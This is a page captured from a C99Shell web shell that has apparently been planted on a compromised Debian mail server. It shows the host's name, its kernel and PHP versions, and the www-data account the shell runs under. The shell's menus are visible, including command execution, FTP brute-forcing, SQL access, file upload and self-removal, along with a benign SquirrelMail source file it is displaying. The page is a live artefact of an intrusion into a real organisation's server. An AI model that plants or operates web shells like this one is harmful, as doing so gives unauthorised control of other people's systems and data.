!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.16 (Debian). PHP/5.3.3-7+squeeze19 

uname -a: Linux mail.tri-specialutilitydistrict.com 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC
2014 x86_64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/squirrelmail/src/   drwxr-xr-x
Free 130.08 GB of 142.11 GB (91.53%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     folders_subscribe.php (2.41 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * folders_subscribe.php
 *
 * Subscribe and unsubcribe from folders. 
 * Called from folders.php
 *
 * @copyright 1999-2010 The SquirrelMail Project Team
 * @license http://opensource.org/licenses/gpl-license.php GNU Public License
 * @version $Id: folders_subscribe.php 13893 2010-01-25 02:47:41Z pdontthink $
 * @package squirrelmail
 */

/** This is the folders_subscribe page */
define('PAGE_NAME''folders_subscribe');

/**
 * Path for SquirrelMail required files.
 * @ignore
 */
define('SM_PATH','../');

/* SquirrelMail required files. */
require_once(SM_PATH 'include/validate.php');
require_once(
SM_PATH 'functions/global.php');
require_once(
SM_PATH 'functions/imap.php');
require_once(
SM_PATH 'functions/display_messages.php');

/* globals */
sqgetGlobalVar('key',       $key,           SQ_COOKIE);
sqgetGlobalVar('username',  $username,      SQ_SESSION);
sqgetGlobalVar('onetimepad',$onetimepad,    SQ_SESSION);
sqgetGlobalVar('method',    $method,        SQ_GET);
sqgetGlobalVar('mailbox',   $mailbox,       SQ_POST);
if (!
sqgetGlobalVar('smtoken',$submitted_tokenSQ_POST)) {
    
$submitted_token '';
}
/* end globals */

// first, validate security token
sm_validate_security_token($submitted_token3600TRUE);

$location get_location();

if (!isset(
$mailbox) || !isset($mailbox[0]) || $mailbox[0] == '') {
    
header("Location: $location/folders.php");

    exit(
0);
}

$imapConnection sqimap_login($username$key$imapServerAddress$imapPort0);

if (
$method == 'sub') {
    if(
$no_list_for_subscribe && $imap_server_type == 'cyrus') {
       
/* Cyrus, atleast, does not typically allow subscription to
        * nonexistent folders (this is an optional part of IMAP),
        * lets catch it here and report back cleanly. */
       
if(!sqimap_mailbox_exists($imapConnection$mailbox[0])) {
          
header("Location: $location/folders.php?success=subscribe-doesnotexist");
          
sqimap_logout($imapConnection);
          exit(
0);
       }
    }
    for (
$i=0$i count($mailbox); $i++) {
        
$mailbox[$i] = trim($mailbox[$i]);
        
sqimap_subscribe ($imapConnection$mailbox[$i]);
    }
    
$success 'subscribe';
} else {
    for (
$i=0$i count($mailbox); $i++) {
        
$mailbox[$i] = trim($mailbox[$i]);
        
sqimap_unsubscribe ($imapConnection$mailbox[$i]);
    }
    
$success 'unsubscribe';
}

sqimap_logout($imapConnection);
header("Location: $location/folders.php?success=$success");


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0085 ]--